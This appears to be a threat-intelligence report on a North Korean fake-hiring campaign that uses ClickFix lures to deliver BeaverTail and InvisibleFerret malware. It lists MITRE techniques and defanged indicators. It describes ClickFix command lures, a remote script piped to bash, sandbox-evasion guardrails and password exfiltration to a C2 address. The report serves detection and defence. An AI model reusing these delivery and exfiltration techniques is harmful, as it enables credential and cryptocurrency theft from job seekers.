North Korean operators used ClickFix lures on a fake hiring site to distribute compiled BeaverTail and InvisibleFerret payloads beginning in May 2025, shifting targeting toward marketing and trading roles and delivering binaries bundled with pkg and PyInstaller. The campaign used infrastructure including businesshire[.]top, nvidiasdk.fly[.]dev, and C2 172.86.93.139 and shows testing artifacts and low-scale deployment to date. #BeaverTail #InvisibleFerret
Keypoints
- North Korean threat actors (tracked as Contagious Interview / Famous Chollima) distributed BeaverTail and InvisibleFerret since at least May 2025 using a ClickFix-based fake hiring site (businesshire[.]top).
- The campaign shifts targeting from software developers to marketing and cryptocurrency trader roles and impersonates a US ecommerce retailer, broadening victim profiles.
- Payloads were delivered as compiled executables (pkg, PyInstaller) for macOS and Windows rather than only JavaScript/Python scripts, improving execution on non-developer systems.
- The threat actor used header-based guardrails and decoy payloads from nvidiasdk.fly[.]dev to evade automated detection and sandbox analysis.
- macOS, Windows, and Linux infection chains differ: macOS uses a malicious installer and preinstall script, Windows uses an archive with update.vbs and nvidiasdk.exe, and Linux pipes scripts to bash to run a JavaScript BeaverTail.
- Malware uses C2 172.86.93.139 and campaign identifier tttttt; samples show low static detection but clear network/file behavior when executed.
- Operational artifacts (hard-coded allowlist IPs, GitHub commits, and developer handles) indicate testing activity and linkages to repositories RominaMabelRamirez/dify and RominaMabelRamirez/hflix.
MITRE Techniques
- [T1204] User Execution – ClickFix lures presented fake troubleshooting/captcha and instructed users to run OS-specific commands to download and execute payloads (“…troubleshooting instructions contain an operating system-specific command to execute a subsequent stage via the system command line…”).
- [T1105] Ingress Tool Transfer – The ClickFix commands download payloads from nvidiasdk.fly[.]dev and GitHub (RominaMabelRamirez repositories) to transfer BeaverTail/InvisibleFerret binaries (“…downloads an installer package from the threat actor’s backend… downloads two additional unsigned Mach-O binaries from the same branch and repository…”).
- [T1059] Command and Scripting Interpreter – Linux chain pipes a remote script into bash to install node and run BeaverTail JavaScript (“…uses wget to download a script file, which is piped directly into bash… installs node via the nvm-sh installer script… executes the payload with the command node ~/.linvidia 2>&1 &”).
- [T1202] Indirect Command Execution – The macOS installer uses a preinstall script to run further scripts and binaries, leveraging installer preinstall hooks to execute malicious actions (“…installer package… contains no payload data and only serves to execute a preinstall script named preinstall… downloads and attempts to execute a bash script named downx64.sh…”).
- [T1041] Exfiltration Over C2 Channel – The preinstall script attempts to exfiltrate a password variable to a remote URL hxxp[:]//172.86.93[.]139:3000/pawr/ (“…attempts to read a user’s password from the variable MY_PASWOR in the file ~/.myvars and exfiltrate it to a remote IP address, hxxp[:]//172.86.93[.]139:3000/pawr/.”).
- [T1036] Masquerading – The campaign used a fake hiring site and named packages/executables (e.g., com.nvidiahpc.pkg, nvidiasdk.exe, signed Nvidia Broadcast decoy) to appear legitimate (“…installer for a package named com.nvidiahpc.pkg… benign VisualBasic script file and a legitimate, signed Nvidia Broadcast executable…”).
- [T1113] Screen Capture – BeaverTail and InvisibleFerret steal browser and system credentials and request video responses as part of the lure to induce actions and capture data (“…BeaverTail infections steal sensitive cryptocurrency wallet data and browser and system credentials then load a second stage… Application pages … prompt to record a short video response…”).
Indicators of Compromise
- [Domain] fake hiring site and backend – businesshire[.]top, nvidiasdk.fly[.]dev
- [IP] command and control and actor origin – 172.86.93[.]139 (C2 for BeaverTail/InvisibleFerret), 188.43.33[.]250 (observed actor origin)
- [File Hash SHA256] macOS/Windows/Linux malware samples – 25c9fc5c5564a74430b92cb658d43e441dee1b3c0f692dc2571ac2918efa9a52 (x64nvidia BeaverTail Mach-O), e79b827b3cc29e940736dc20cc9c25958c0b09c25fc0bc8aacbd6365f38db71f (nvidiasdk.exe BeaverTail PE), 4a1588e27a3f322e94e490173fe2bfa8d6e2f407b81a77af8787619b0d3d10bd (linvidia BeaverTail JS)
- [File Hash SHA256] supporting/installer files – 05ae07783d30b37aa5f0ffff86adde57d0d497fe915537a3fc010230b54e1ee8 (nvidia.pkg), 247fdba5fbfd076d9c530d937406aa097d6794b9af26bfc64bf6ea765ed51a50 (preinstall script)
- [Persona] GitHub handles and emails – RominaMabelRamirez (repo owner), Yash-1511 (Git identity, [email protected]), dmytroviv1 (repo committer, [email protected])